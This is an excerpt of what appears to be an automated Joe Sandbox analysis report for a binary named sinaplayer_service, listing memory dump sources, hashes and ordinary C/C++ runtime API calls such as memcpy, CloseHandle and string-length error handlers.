• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$ExceptionThrowmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1404817050-0
                                                                                                                                                                                                    • Opcode ID: 18da5e5de87d18377df82ac96a263908e3cbf9f5847e644e339fec4c9ece2bfd
                                                                                                                                                                                                    • Instruction ID: 2fc46f403a911074b1f920503f249ad8011ddffced15e830f4720c2e87f159e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18da5e5de87d18377df82ac96a263908e3cbf9f5847e644e339fec4c9ece2bfd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D018FB29147409FEB369F58D44571AFBE1EB11700F000E6DD8CAAB6C2E3B66944C7A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time__aulldiv$FileSystem_i64tow_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3004546483-0
                                                                                                                                                                                                    • Opcode ID: a024249f8d00c401c5d1b33db63b77d1760fb90bab331b6cfaf95603f3ac689f
                                                                                                                                                                                                    • Instruction ID: 70628a6eedb59f50ec215b548c4e2a18c92659d70f201689b4817a80bb496905
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a024249f8d00c401c5d1b33db63b77d1760fb90bab331b6cfaf95603f3ac689f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94F0A4B6A40304BFE7249FA8DD46F5A77BCAB84712F004259FA05A72C0D6B0B5048AA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,?,?,?,0039B158,000000FF), ref: 00388079
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 00388084
                                                                                                                                                                                                    • ??1RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0038809A
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120 ref: 003880A7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$Base@internal@base@@Base@subtle@base@@CallbackCountedSafeThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3706058453-0
                                                                                                                                                                                                    • Opcode ID: 6071b7ec2e2ee1a63fba5156755658eba713b8c697c771fb44ef86c9a1dd0cea
                                                                                                                                                                                                    • Instruction ID: f9116bc21aa8da28a82980e801718ae61ad7c9e2da1f8d4e17dda72a526e08ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6071b7ec2e2ee1a63fba5156755658eba713b8c697c771fb44ef86c9a1dd0cea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F101A7B1904748EFC722DF58DD01B9ABBF8EB05710F10466EE82993790E7756904CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6C562CF0,0000000C), ref: 6C562C9B
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,6C562CF0,0000000C), ref: 6C562CB3
                                                                                                                                                                                                      • Part of subcall function 6C55EDD7: EnterCriticalSection.KERNEL32(?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C55EDF3
                                                                                                                                                                                                      • Part of subcall function 6C562D0C: _unlock.MSVCR120(0000000C,6C562CDF,0000000C), ref: 6C562D0E
                                                                                                                                                                                                    • _getptd.MSVCR120(6C562CF0,0000000C), ref: 6C5AF3D2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$CriticalEnterSection_lock_unlock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2319614578-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6C5BED20
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(00000000), ref: 6C5BED25
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(00000000), ref: 6C5BED36
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6C5BED43
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::HillHistory::IsqrtMeasured$MeanVariance
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4254205323-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00374DB0: ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120(?,00372082), ref: 00374DB9
                                                                                                                                                                                                      • Part of subcall function 00374DB0: ??3@YAXPAX@Z.MSVCR120(00375490,?,00372082), ref: 00374DC4
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372964
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037296D
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00372976
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00372983
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$??3@$??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?pptr@?$basic_streambuf@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1202211527-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00000008), ref: 003822BE
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 003822D3
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(?), ref: 003822E7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 003822F7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@DecrementFreeInterlockedString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1462092259-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C55EDF3
                                                                                                                                                                                                    • __amsg_exit.LIBCMT(00000011,?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C5A3BBA
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6C5A3BC9
                                                                                                                                                                                                    • _errno.MSVCR120(6C564630,00000008,6C57C625,?,?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C5A3BDC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterSection__amsg_exit_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4121137658-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,6C564FF8,0000000C), ref: 6C564FCD
                                                                                                                                                                                                      • Part of subcall function 6C564B96: _lock.MSVCR120(?), ref: 6C564BC1
                                                                                                                                                                                                    • _fclose_nolock.MSVCR120(?,?,?,6C564FF8,0000000C), ref: 6C564FD8
                                                                                                                                                                                                      • Part of subcall function 6C564F4C: __freebuf.LIBCMT ref: 6C564F6E
                                                                                                                                                                                                      • Part of subcall function 6C564F4C: _fileno.MSVCR120(?,?,?), ref: 6C564F74
                                                                                                                                                                                                      • Part of subcall function 6C564F4C: _close.MSVCR120(00000000,?,?,?), ref: 6C564F7A
                                                                                                                                                                                                      • Part of subcall function 6C565014: _unlock_file.MSVCR120(?,6C564FEF,?,?,6C564FF8,0000000C), ref: 6C565015
                                                                                                                                                                                                    • _errno.MSVCR120(6C564FF8,0000000C), ref: 6C5A541D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C564FF8,0000000C), ref: 6C5A5428
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1403730806-0
                                                                                                                                                                                                    • Opcode ID: bd067d519a1f9dba788fb48ff492a64594f1855432f85aaa16b75e73712c8d1f
                                                                                                                                                                                                    • Instruction ID: 38da1e8d8a9cf016344a282c1060848f26290bfc08deefa5cb7c715ab9b4c3e0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd067d519a1f9dba788fb48ff492a64594f1855432f85aaa16b75e73712c8d1f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F09031801604EED711DBA7DC00B9EB6E06F81339F518649D824ABFE0CB7C8D069F95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C5BCDD4
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000004,6C5BCB35), ref: 6C5BCDF9
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000004,6C5BCB35), ref: 6C5BCE10
                                                                                                                                                                                                    • Concurrency::details::ContextBase::~ContextBase.LIBCMT ref: 6C5BCE36
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseContextHandle$BaseBase::~Concurrency::details::H_prolog3
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 256686745-0
                                                                                                                                                                                                    • Opcode ID: 963798c4568e8b428dcdb878023fa0a84e48c2ed84dead1c4823289eb127b258
                                                                                                                                                                                                    • Instruction ID: dce7651f585663fda63f62c80bb7b80b39b5d569a2e7f6f849be18724ed3e955
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 963798c4568e8b428dcdb878023fa0a84e48c2ed84dead1c4823289eb127b258
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF04F70B01700CBDB249F76889579ABAE4AF85604F50041DA59B9BB00CB74A804CB59
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __p__iob.MSVCR120(6C570850,00000010), ref: 6C570823
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6C57082F
                                                                                                                                                                                                      • Part of subcall function 6C57079C: __p__iob.MSVCR120(6C570842,6C570850,00000010), ref: 6C57079C
                                                                                                                                                                                                    • __p__iob.MSVCR120(6C570850,00000010), ref: 6C57086C
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(0000000A,-00000020,6C570850,00000010), ref: 6C570877
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$__ftbuf_fputwc_nolock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2527319753-0
                                                                                                                                                                                                    • Opcode ID: 6ff86a049333a4de97063c5c71ac72e177c6a85fe1bee56a3ed504a515b622a2
                                                                                                                                                                                                    • Instruction ID: 74dd8a06d02ae3266fc13360cea5393b57dcec538091928d143b58d2224a8eb1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ff86a049333a4de97063c5c71ac72e177c6a85fe1bee56a3ed504a515b622a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65E0D8B78A424195AE1497FA9C11AFC33E09BD426CB640106E410D5FD0DF1958C50724
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00372713
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037271F
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037272E
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00372741
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?uncaught_exception@std@@Osfx@?$basic_ostream@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1787288787-0
                                                                                                                                                                                                    • Opcode ID: 78efb293f3b9f61d23e114cb14e0234a4c3f2dddaab46c0746c85d4fb022a350
                                                                                                                                                                                                    • Instruction ID: 52a3a06b592b8d519dac07b91ef684a704f0fc24963fd690052a44ed6753eb92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78efb293f3b9f61d23e114cb14e0234a4c3f2dddaab46c0746c85d4fb022a350
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF0ED38304101CFD729EF28E598D65B7FAFF89301719899AD4868B365CB36DC42CB80
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,8285FFAB), ref: 0038AC28
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,rept,00000004,?,8285FFAB), ref: 0038AD1F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                    • String ID: rept
                                                                                                                                                                                                    • API String ID: 613200358-3594088979
                                                                                                                                                                                                    • Opcode ID: 6e0698ea7a7830b9cee241cd7bfafe35317ffb92d6a354bc704378e0a4eb6e19
                                                                                                                                                                                                    • Instruction ID: f4bb4d1abcde1505f270d6b04758598e861ef4463870addcf211b165a73ba250
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e0698ea7a7830b9cee241cd7bfafe35317ffb92d6a354bc704378e0a4eb6e19
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06919E71900719EFDF16EFA4C841BEEB7BAFF44314F1841AAE416AB280D770A945CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003769A4
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(map/set<T> too long), ref: 003769B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: map/set<T> too long
                                                                                                                                                                                                    • API String ID: 2313657577-1285458680
                                                                                                                                                                                                    • Opcode ID: ef8a53ab18b7d50cdea164f520d0f98e9d559f4b2fce04875195144865dc83e0
                                                                                                                                                                                                    • Instruction ID: 4315a3fd85c2bc60894701de51612ac6c7d0ac23a64ad3eb04159eed8aa381f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef8a53ab18b7d50cdea164f520d0f98e9d559f4b2fce04875195144865dc83e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC9194B4604641DFD72ACF09C1A5A20FBE6BB5A318B29C59DD44D8F352C776EC82CB80
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,003710EA,?,?), ref: 00371573
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?,?,?,?,?,003710EA,?,?), ref: 003715C8
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 003713FA
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 0037141A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@$Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 3790025958-2556327735
                                                                                                                                                                                                    • Opcode ID: 69f661561828619d3aec86d14808375f23d99343195a075e55549a2e377872b3
                                                                                                                                                                                                    • Instruction ID: 2d8b97b32cd4164838bc9a0e9dcc7b168b58d3e1c1e64724d466fe55360d4d5d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69f661561828619d3aec86d14808375f23d99343195a075e55549a2e377872b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C431D5333106105BD73B9E5CA88096AF7AAEBD6770B20852BF59ACB740C766DC4487E0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,00371E69,?,?), ref: 00375167
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,00000007,?,?,?,?,00371E69,?,?), ref: 003751C3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 237780522-2556327735
                                                                                                                                                                                                    • Opcode ID: cfbf4df4201ed030652820045273be80cfabcaf78774d7b3a5653d4b55ca684d
                                                                                                                                                                                                    • Instruction ID: dc9c04c2170a93a3fabe36bc9def8034ce1b79b86907f23b57d9247ceea55cb0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfbf4df4201ed030652820045273be80cfabcaf78774d7b3a5653d4b55ca684d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC31C932314B149B8E3A9E5CEC8096AF3EAFF947533A0852FE14AC7710D765AC4487A4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,003722E9,?,?,00000000,-00000002,00000000,-00000002), ref: 00374F6E
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,00000000,00000000,00000000,?,?,?,?,003722E9,?,?,00000000,-00000002,00000000,-00000002), ref: 00374FA5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
